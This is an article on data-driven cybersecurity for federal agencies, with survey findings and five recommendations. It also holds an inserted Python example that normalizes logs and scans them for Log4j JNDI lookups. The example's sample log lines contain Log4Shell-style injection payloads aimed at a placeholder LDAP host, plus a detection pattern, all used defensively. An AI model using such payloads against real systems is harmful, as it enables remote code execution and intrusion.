Outpace Threats with Data-Driven Cybersecurity

What is Data-Driven Cybersecurity?

Here’s the good news: Organizations can overcome information overload. Adopting data-driven cybersecurity is about figuring out how to extract, normalize, and apply data to accelerate security operations—ideally faster than adversaries. Analytics and AI technology can help the government obtain a holistic view of the federal cybersecurity ecosystem.

Along the way, agencies may need to leverage outside technical expertise. In the survey, most respondents (60%) said they had limited knowledge of cyber data analytics. And respondents were roughly split on whether they had limited or substantial knowledge of cyber-focused AI and ML. Respondents included mostly federal and military personnel, as well as stakeholders in think tanks, non-governmental organizations, lobbying roles, and the legislative branch. 

Data-driven cybersecurity, bounded by strategic business objectives, leverages talent and technology to deliver value across entire organizations—for instance, by equipping various internal teams with shared awareness of vital data. This requires a culture change, which is enabled, in part, by an integrated approach that lets security functions jointly overcome challenges with the right capabilities, management, and architecture tailored to fit the organization.

This approach integrates high volumes of disparate data from formerly siloed groups—for instance, teams focused on cyber operations, incident response, cyber intelligence, information protection services, security and investigations, legal, communications, and compliance issues. With use cases and data governance guided from the top, these teams are more empowered to make the real-time decisions needed to carry out critical missions and counter emerging threats. Operating with a clear vision also reduces the alert churn for security teams.

In addition, this approach makes it more cost-effective to store massive quantities of cybersecurity data for longer periods, which lets organizations gain the benefits of security analytics at scale in real time. And this, in turn, can enable advanced cybersecurity that uses predictive analytics and turns threat intelligence into actionable insights. 

What Are the Next Steps?

The Cybersecurity and Infrastructure Security Agency (CISA) should take the lead in operationalizing data from agencies and federal sensors to supply intelligence for proactive cyber defense operations. Fortunately, CISA is increasingly focused on conducting persistent hunts for threat activity, ingesting and analyzing security data at all levels of the network, and conducting rapid analysis to spot and counter threats.

In addition, all FCEB agencies and critical infrastructure entities should embrace data-driven cybersecurity. Here are five recommendations for putting this approach into action:

  • Commit to being vendor neutral: Every vendor is trying to lock you into their system. The best way to break out of that is to make all data go through an open architecture. To that end, CISA should look to develop and implement a common data model—for instance, for all endpoint detection and response (EDR) data. 
  • Assess internal needs: Organizations should conduct an analysis and make the data available to whoever needs to consume it. Data access should be controlled centrally. Along the way, agencies lacking knowledge in cyber data analytics and cyber-focused AI and ML should leverage expertise from elsewhere in government or in the private sector. 
  • Plan phased improvements: Organizations can begin with basic capabilities and then upgrade to advanced and leading capabilities over time. Leading organizations can work toward implementing the architecture for a cloud-native, cyber-focused data pipeline for streaming analytics (threat hunt, detection, and compliance). 
  • Act locally, think strategically: The more headway organizations make in overcoming their own silos, the better they will be able to contribute to the cybersecurity of the broader ecosystem. As National Cybersecurity Director Chris Inglis has noted, the collaborative development of insights across silos and stovepipes is increasingly important for the benefit of all.
  • Prepare now for the next threat: Organizations need to start moving ahead of threats—and the best way to do that is to proactively ready data to be analyzed and queried. Data must be normalized and made accessible. With each new threat, different datasets have become more valuable. In the case of Log4J vulnerabilities, for example, organizations could have been querying their application and firewall logs for potential attacks while they waited for vendors to self-identify and issue patches, or for vulnerability scanners to update their definitions. Being proactive is even more important when organizations must protect cloud-based systems and federated networks.
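
One way to act on the last recommendation, as an added example that is not part of the original article: two constructed log formats are normalized into one shared record layout and then queried for the JNDI lookup string associated with the Log4j vulnerabilities. The log layouts, field names, and sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample input: two sources with different native formats.
APP_LOG = [
    '203.0.113.7 - - [15/Jan/2024:09:14:02 +0000] "GET /search?q=shoes HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.23 - - [15/Jan/2024:09:15:41 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
]
FW_LOG = [
    "time=2024-01-15T09:16:05Z action=allow src=192.0.2.10 dst=10.0.0.5 url=/login",
    "time=2024-01-15T09:17:30Z action=allow src=192.0.2.44 dst=10.0.0.5 "
    "url=/api?x=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fb%7D",
]

# Assumed access-log layout: client, timestamp, request line, status, user agent.
APP_RE = re.compile(
    r'(?P<src>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \d{3} "(?P<ua>[^"]*)"'
)

def normalize_app(line):
    """Map an application access-log line onto the shared record layout."""
    m = APP_RE.match(line)
    if not m:
        return None  # unparseable lines are skipped, not guessed at
    return {"source": "app", "ts": m["ts"], "src_ip": m["src"],
            "text": f'{m["req"]} {m["ua"]}'}

def normalize_fw(line):
    """Map a key=value firewall line onto the same layout."""
    kv = dict(part.split("=", 1) for part in line.split())
    return {"source": "firewall", "ts": kv["time"], "src_ip": kv["src"],
            "text": kv.get("url", "")}

def load_all():
    records = [normalize_app(l) for l in APP_LOG] + [normalize_fw(l) for l in FW_LOG]
    return [r for r in records if r]

# Matches the literal lookup prefix only, case-insensitively.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)

def find_jndi_lookups(records):
    """One query over every source; URL-decode first so encoded requests match."""
    return [r for r in records if JNDI_RE.search(unquote(r["text"]))]

if __name__ == "__main__":
    for hit in find_jndi_lookups(load_all()):
        print(hit["source"], hit["ts"], hit["src_ip"])
```

Because both sources land in the same layout, the query is written once and a new log source only needs its own normalizer.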

In short, data-driven cybersecurity is a national imperative. Data is the linchpin for full-spectrum U.S. cyber capabilities designed to defend the nation and counter threats. Embracing a data-driven approach can drive advancements in cyber threat hunting, cyber threat information sharing, supply chain security, zero trust, and beyond. It’s never been more important for government agencies and critical infrastructure entities to embark on this path.